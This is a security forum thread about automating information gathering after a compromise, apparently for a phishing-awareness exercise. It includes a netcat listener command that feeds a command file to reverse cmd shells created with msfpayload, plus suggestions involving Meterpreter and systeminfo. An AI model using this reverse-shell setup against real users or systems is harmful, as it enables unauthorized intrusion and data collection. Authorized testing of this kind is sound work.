Automated post-compromise infomation gathering

[Andrew Waite]

Hi All,

I'm looking for a method to automatically gather system/user information post compromise. I've used DarkOperator's winenumn meterpreter script, but I don't fancy having to stare intently at a box waiting for compromised systems to connect back to by server to initiate info gathering.

More information would always be better, but initially a minimum would be system and username of compromised account for client-side/user awareness suffs. Not too concerned at this point if it is via a (free) framework (metasploit etc) or a standalone solution. I know Assagai is in the pipeline which sounds like it should handle my requirements needs but I haven't seen any release date information yet.

Don't think for a second I'm dealing with anything innovative or unique so I'm wondering how others deal with the same scenario.

Thanks in advance,
Andrew

[Ketchup]

Andrew, do you mean something like the MIRROR incident response toolset?

http://mirror.codeplex.com/

[Jhaddix]

hmm... i thought assagai was a phishing framework, ill have to re look into that project.

Depending on your scope you could just cmd.exe > batch script something couldnt you?

i mean thats all MIRROR is but with sysinternals tools built in...

[UNIX]

If I remember correctly, I too think that Assagai was some kind of Phishing Framework.

MIRROR should be able to do what you want.

If you don't care and have some time to spend maybe you could write such a program in Python, which shouldn't be too hard.

[Andrew Waite]

Hi guys,

thanks for the responses. Your right, Assagai is supposedly going to be a phishing framework, but from the little I've read about it it should have some decent tracking and metric capabilities built in.

To expand a little on what I'm toying with I'm looking at a way to track and record which users clicked the link, or opened the attachment, or did 'other bad stuffs'.

Batch scripting cmd.exe shells was the first thing that sprung to mind, but I didn't want to re-invent the wheel if it had already been done. I don't have any real world experience with MIR-ROR, didn't think it would be that simple to tie into client's connection back. Looks like I'll need to re-evaluate and give it a closer look.

Andrew

[Andrew Waite]

I've been playing with this some more after getting home from work.

Decided to go down the automated cmd route, which turned out to be simpler than I had expected. For testing purposes I've used metasploit's msfpayload to generate a windows executable returning a reverse cmd shell. On the listening side I've simply got a netcat listener, feeding in a textfile containing commands to run once the connection is established:
# nc -vnlp 4444 < commands.txt

I still need to decide exactly which commands I want to run to gather which data, how I want to distribute my shellcode to unsuspecting guinea pigs.

Thanks for the assistance and suggestions.

[dalepearson]

Sounds like you got it covered Andrew, you might want to take a look at http://trac.metasploit.com/wiki/AutomatingMeterpreter

Happy Hunting.
Dale

[Andrew Waite]

Sounds like just the thing, cheers Dale much appreciated

[Jhaddix]

while that script is awesome it could use the systeminfo command, it returns a plethora of information that is useful.

Example:

C:\Documents and Settings\Ender>systeminfo

Host Name:                 DESKTOP
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Jason
Registered Organization:
Product ID:                
Original Install Date:     6/13/2010, 12:00:44 AM
System Up Time:            0 Days, 4 Hours, 19 Minutes, 37 Seconds
System Manufacturer:       GBT___
System Model:              NVDAACPI
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 15 Model 75 Stepping 2 AuthenticAMD
~2211 Mhz
BIOS Version:              GBT    - 42302e31
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-08:00) Pacific Time (US & Canada)
Total Physical Memory:     3,327 MB
Available Physical Memory: 2,409 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 1,997 MB
Virtual Memory: In Use:    51 MB
Page File Location(s):     D:\pagefile.sys
Domain:                    SHARE
Logon Server:              \\DESKTOP
Hotfix(s):                 115 Hotfix(s) Installed.
                           [01]: File 1
                           [02]: File 1
                           [03]: File 1
                           [04]: File 1
                           [05]: File 1
                           [06]: File 1
                           [07]: File 1
                           [08]: File 1
                           [09]: File 1
                           [10]: File 1
                           [11]: File 1
                           [12]: File 1
                           [13]: File 1
                           [14]: File 1
                           [15]: File 1
                           [16]: File 1
                           [17]: File 1
                           [18]: File 1
                           [19]: File 1
                           [20]: File 1
                           [21]: File 1
                           [22]: File 1
                           [23]: File 1
                           [24]: File 1
                           [25]: File 1
                           [26]: File 1
                           [27]: File 1
                           [28]: File 1
                           [29]: File 1
                           [30]: File 1
                           [31]: File 1
                           [32]: File 1
                           [33]: File 1
                           [34]: File 1
                           [35]: File 1
                           [36]: File 1
                           [37]: File 1
                           [38]: File 1
                           [39]: File 1
                           [40]: File 1
                           [41]: File 1
                           [42]: File 1
                           [43]: File 1
                           [44]: File 1
                           [45]: File 1
                           [46]: File 1
                           [47]: File 1
                           [48]: File 1
                           [49]: File 1
                           [50]: File 1
                           [51]: File 1
                           [52]: Q147222
                           [53]: Q954430
                           [54]: IDNMitigationAPIs - Update
                           [55]: NLSDownlevelMapping - Update
                           [56]: KB929399
                           [57]: KB952069_WM9
                           [58]: KB973540_WM9
                           [59]: KB936782_WMP11
                           [60]: KB939683
                           [61]: KB954154_WM11
                           [62]: KB959772_WM11
                           [63]: KB941569
                           [64]: KB938127-v2-IE7 - Update
                           [65]: KB969897-IE7 - Update
                           [66]: KB972260-IE7 - Update
                           [67]: MSCompPackV1 - Update
                           [68]: KB898461 - Update
                           [69]: KB923561 - Update
                           [70]: KB938464-v2 - Update
                           [71]: KB946648 - Update
                           [72]: KB950760 - Update
                           [73]: KB950762 - Update
                           [74]: KB950974 - Update
                           [75]: KB951066 - Update
                           [76]: KB951376-v2 - Update
                           [77]: KB951748 - Update
                           [78]: KB951978 - Update
                           [79]: KB952004 - Update
                           [80]: KB952287 - Update
                           [81]: KB952954 - Update
                           [82]: KB954459 - Update
                           [83]: KB954550-v5 - Update
                           [84]: KB954600 - Update
                           [85]: KB955069 - Update
                           [86]: KB955839 - Update
                           [87]: KB956572 - Update
                           [88]: KB956744 - Update
                           [89]: KB956802 - Update
                           [90]: KB956803 - Update
                           [91]: KB957097 - Update
                           [92]: KB958644 - Update
                           [93]: KB958687 - Update
                           [94]: KB959426 - Update
                           [95]: KB960225 - Update
                           [96]: KB960803 - Update
                           [97]: KB960859 - Update
                           [98]: KB961118 - Update
                           [99]: KB961371 - Update
                           [100]: KB961373 - Update
                           [101]: KB961501 - Update
                           [102]: KB967715 - Update
                           [103]: KB968389 - Update
                           [104]: KB968537 - Update
                           [105]: KB969897 - Update
                           [106]: KB969898 - Update
                           [107]: KB970238 - Update
                           [108]: KB971557 - Update
                           [109]: KB971633 - Update
                           [110]: KB971657 - Update
                           [111]: KB973346 - Update
                           [112]: KB973354 - Update
                           [113]: KB973507 - Update
                           [114]: KB973815 - Update
                           [115]: KB973869 - Update
NetWork Card(s):           5 NIC(s) Installed.
                           [01]: 1394 Net Adapter
                                 Connection Name: 1394 Connection
                           [02]: NVIDIA nForce Networking Controller
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.1.1
                                 IP address(es)
                                 [01]: 192.168.1.56
                           [03]: VMware Virtual Ethernet Adapter for VMnet1
                                 Connection Name: VMware Network Adapter VMnet1
                           [04]: VMware Virtual Ethernet Adapter for VMnet8
                                 Connection Name: VMware Network Adapter VMnet8
                           [05]: Cisco AnyConnect VPN Virtual Miniport Adapter f
or Windows
                                 Connection Name: Cisco AnyConnect VPN Client Co
nnection

C:\Documents and Settings\Ender>

[Andrew Waite]

Thanks Jason,

I'll be adding that to my toolbox. Looks like it grabs most of what I'm looking for in one simple command

[LSOChris]

if you are going to use metasploit you might as well just write your own meterpreter script to do it, even if its a simple as pushing up and your batch script and running in it...even though writing to disk should be avoided.